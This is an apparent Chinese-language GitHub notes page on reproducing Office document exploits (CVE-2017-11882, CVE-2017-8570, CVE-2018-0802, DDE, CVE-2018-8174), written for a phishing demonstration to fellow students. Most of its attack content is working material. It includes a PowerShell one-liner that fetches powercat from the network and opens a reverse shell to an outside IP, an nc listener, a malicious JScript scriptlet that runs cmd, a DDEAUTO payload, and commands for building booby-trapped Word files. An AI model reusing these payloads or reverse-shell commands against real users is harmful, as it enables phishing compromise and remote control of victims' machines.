Skip to content

Latest commit

 

History

History
103 lines (64 loc) · 3.59 KB

8.Office相关漏洞复现.md

File metadata and controls

103 lines (64 loc) · 3.59 KB

新的一年迎新又开始啦,回想一年前这个时候的自己,算是有那么一丢丢的进步了吧。一年前的时候,貌似php都不会2333,浏览器的开发者工具都不晓得, 貌似就会搭一个wifi,hahah,扎心了,新的一年努力学习吧骚年!!! 这次迎新让同学们见识下钓鱼邮件是什么样子的,主要放的是word文档,也可以整理下office这两年爆出的漏洞,虽然说过不了360的吧,但是演示起来很酷的呀~

CVE-2017-11882

其实复现起来都很好说,github上都给了生成文件的脚本了 链接 首先为了实际钓鱼中应用,先弹个shell再说,找到了两种方式,一种是powershell 反弹一句话,另一种是直接写入shellcode运行,先看第一种 powershell一句话反弹shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 1.1.1.1 -p 9999 -e cmd

参考链接

然后利用脚本构造恶意文件

kali上nc监听端口等待连接 nc -lvp 9999 目标打开恶意word文档后 shell反弹回来

第二种方式先用msfvenom生成shellcode

然后利用脚本生成恶意word文档

目标打开文档后msf上线

不过后来考虑了下,同学们应该get不到上面操作的含义,所以直接来个简单直接的办法

python a.py -c "cmd.exe /c start ssText3d.scr /s" -o 1.doc 同学们打开恶意文档后就会出现如下文字

CVE-2017-8570

Github脚本链接

实现跳出文字的效果,这里要注意一下,先要修改calc.sct文件

<?XML version="1.0"?>
<scriptlet>

<registration
    description="fjzmpcjvqp"
    progid="fjzmpcjvqp"
    version="1.00"
    classid="{204774CF-D251-4F02-855B-2BE70585184B}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c start ssText3d.scr /s");
	
	
]]>
</script>

</scriptlet>

然后利用脚本生成恶意文件

这个是远程下载文件calc.sct修改方式

没有尝试powershell一句话,应该可以的吧

CVE-2018-0802

这个是对CVE-2017-11882补丁的一个绕过 github脚本很详细了 链接

DDT

这个用不到office宏 复现很简单

改成DDEAUTO C:\\windows\\system32\\cmd.exe "/c start ssText3d.scr /s"

但是应用的时候要目标点击”是“才行

CVE-2018-8174

这个直接就有msf的脚本呀 放上链接 链接

but这些实际当中还能用嚒,可能会碰上没装杀软的吧hahaha.......